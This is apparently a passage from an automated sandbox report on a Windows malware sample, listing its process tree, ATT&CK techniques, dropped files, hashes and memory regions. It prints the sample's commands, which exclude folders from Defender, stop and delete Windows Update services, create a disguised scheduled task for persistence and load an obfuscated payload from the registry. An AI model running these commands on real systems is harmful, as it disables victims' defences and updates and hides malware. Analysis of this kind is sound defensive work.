        powershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:268
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Add-MpPreference -ExclusionPath $env:UserProfile
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:880
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Add-MpPreference -ExclusionPath $env:ProgramFiles
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1224
    - - C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe
        
        "C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:660
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:844
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:268
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:524
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:1448
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1232
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:896
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1960
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1408
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:612
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1496
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1988
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1500
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:340
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:108
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineUA /tr "'C:\Program Files\Google\Chrome\chromeupdater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:748
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1872

C:\Windows\system32\taskeng.exe
taskeng.exe {78BEA5E1-6B48-478C-9B4F-C393300DAB92} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+'a'+[Char](108)+'e'+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1932
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue('d'+'i'+'a'+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:564

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
13f38cb7aa8627a9afe89379bdc00317

SHA1
348eaa362bdfc84b5c8bbff9b3d7fed37e151814

SHA256
dc168114bdebcea2aefb76d271b9460e8af3d8cfe4a031b671eea8bcd542fac0

SHA512
012489d8ae8b363126cec0b9c8686b984f0327a797f1688c64bcda639653d3ac9beeb58877b7be61014762491c37dc42519764a1ad963dd78ef73c59fd50680d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000151021\test.cmd

Filesize
414B

MD5
0f9c7a5644d304f9d127747ed7ef60ae

SHA1
1d410981c199198a7db3e3957ed73bca3082e91b

SHA256
760b1b6b7c5527515f3f36fb74b5cc30e31864a201cffa971326c9dc8d046c6a

SHA512
8c2b435c7f1e3cdb023346cef159584ce8b0f87f437dfe6670bf5a8391a4e763cffe3280b05af9e10dfefccf8941d374a93d0e12b7697a072a740bec40275d86

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000151021\test.cmd

Filesize
414B

MD5
0f9c7a5644d304f9d127747ed7ef60ae

SHA1
1d410981c199198a7db3e3957ed73bca3082e91b

SHA256
760b1b6b7c5527515f3f36fb74b5cc30e31864a201cffa971326c9dc8d046c6a

SHA512
8c2b435c7f1e3cdb023346cef159584ce8b0f87f437dfe6670bf5a8391a4e763cffe3280b05af9e10dfefccf8941d374a93d0e12b7697a072a740bec40275d86

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab29E1.tmp

Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2AD2.tmp

Filesize
161KB

MD5
be2bec6e8c5653136d3e72fe53c98aa3

SHA1
a8182d6db17c14671c3d5766c72e58d87c0810de

SHA256
1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd

SHA512
0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe

Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe

Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe

Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Roaming\1000157020\test.cmd

Filesize
414B

MD5
0f9c7a5644d304f9d127747ed7ef60ae

SHA1
1d410981c199198a7db3e3957ed73bca3082e91b

SHA256
760b1b6b7c5527515f3f36fb74b5cc30e31864a201cffa971326c9dc8d046c6a

SHA512
8c2b435c7f1e3cdb023346cef159584ce8b0f87f437dfe6670bf5a8391a4e763cffe3280b05af9e10dfefccf8941d374a93d0e12b7697a072a740bec40275d86

Download Submit
C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe

Filesize
3.7MB

MD5
b0a84e4330a9c00c57d3a3e7885f7946

SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519

SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f

Download Submit
C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe

Filesize
3.7MB

MD5
b0a84e4330a9c00c57d3a3e7885f7946

SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519

SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f

Download Submit
C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe

Filesize
3.7MB

MD5
b0a84e4330a9c00c57d3a3e7885f7946

SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519

SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3dc20a54a7d8df7a4d20848a3c87db7b

SHA1
a5d6fbf44a0a542247856bf33b145d7792c68cac

SHA256
b5502f53fef67d6b3764fb0b2a882b0cfeb28bf06f43d42301712be4dcb0dc76

SHA512
2bca3c4752f39e5630e60ab9bdc4adf6e89a3ebeaecf817bd2f1d7c803b469d616aa16b185f655e8ace170c940095b9e8b345d06bcfb750a0a97e6d039071385

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IJZAHU5YWTJ9HQV489XZ.temp

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a3936c3105d5ee80fca56acb921ca62a

SHA1
96f9e92b81c2306b11a80ec7f566ff0d32cce372

SHA256
8ce4a60564a689860df0ee8e12620c96cc1944b5d3de1a020ec817aa17f97bde

SHA512
875ad4640d4b80f38495215a100925cd3d8d4a4b96b8b758655287eb8ab8271b4b94fb0d2e6928e37ccc093b488805b2268ab02e80261bd846c2469bcb5f19f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WeatherApp.exe

Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\WeatherApp.exe

Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
\Users\Admin\AppData\Local\Temp\WeatherApp.exe

Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe

Filesize
3.7MB

MD5
b0a84e4330a9c00c57d3a3e7885f7946

SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519

SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f

Download Submit
memory/108-307-0x0000000002404000-0x0000000002407000-memory.dmp

Filesize
12KB

Download
memory/108-308-0x000000000240B000-0x0000000002442000-memory.dmp

Filesize
220KB

Download
memory/108-306-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download
memory/108-305-0x000000001B0B0000-0x000000001B392000-memory.dmp

Filesize
2.9MB

Download
memory/416-333-0x0000000000380000-0x00000000003A1000-memory.dmp

Filesize
132KB

Download
memory/416-340-0x0000000037710000-0x0000000037720000-memory.dmp

Filesize
64KB

Download
memory/416-336-0x0000000000850000-0x0000000000877000-memory.dmp

Filesize
156KB

Download
memory/416-334-0x0000000000380000-0x00000000003A1000-memory.dmp

Filesize
132KB

Download
memory/416-337-0x000007FEBECB0000-0x000007FEBECC0000-memory.dmp

Filesize
64KB

Download
memory/464-344-0x0000000000240000-0x0000000000267000-memory.dmp

Filesize
156KB

Download
memory/472-346-0x00000000001C0000-0x00000000001E7000-memory.dmp

Filesize
156KB

Download
memory/564-318-0x0000000001060000-0x00000000010A0000-memory.dmp

Filesize
256KB

Download
memory/564-317-0x0000000001060000-0x00000000010A0000-memory.dmp

Filesize
256KB

Download
memory/804-312-0x000000013F270000-0x000000013F631000-memory.dmp

Filesize
3.8MB

Download
memory/804-287-0x000000013F270000-0x000000013F631000-memory.dmp

Filesize
3.8MB

Download
memory/812-330-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/812-329-0x00000000774B0000-0x00000000775CF000-memory.dmp

Filesize
1.1MB

Download
memory/812-328-0x00000000776D0000-0x0000000077879000-memory.dmp

Filesize
1.7MB

Download
memory/812-327-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/812-325-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/816-54-0x0000000000D90000-0x0000000000DB2000-memory.dmp

Filesize
136KB

Download
memory/816-60-0x0000000000CC0000-0x0000000000D00000-memory.dmp

Filesize
256KB

Download
memory/816-55-0x0000000000CC0000-0x0000000000D00000-memory.dmp

Filesize
256KB

Download
memory/1456-75-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1456-79-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1456-204-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1456-80-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1456-212-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1456-179-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1456-78-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1456-270-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1456-77-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1456-81-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1456-187-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
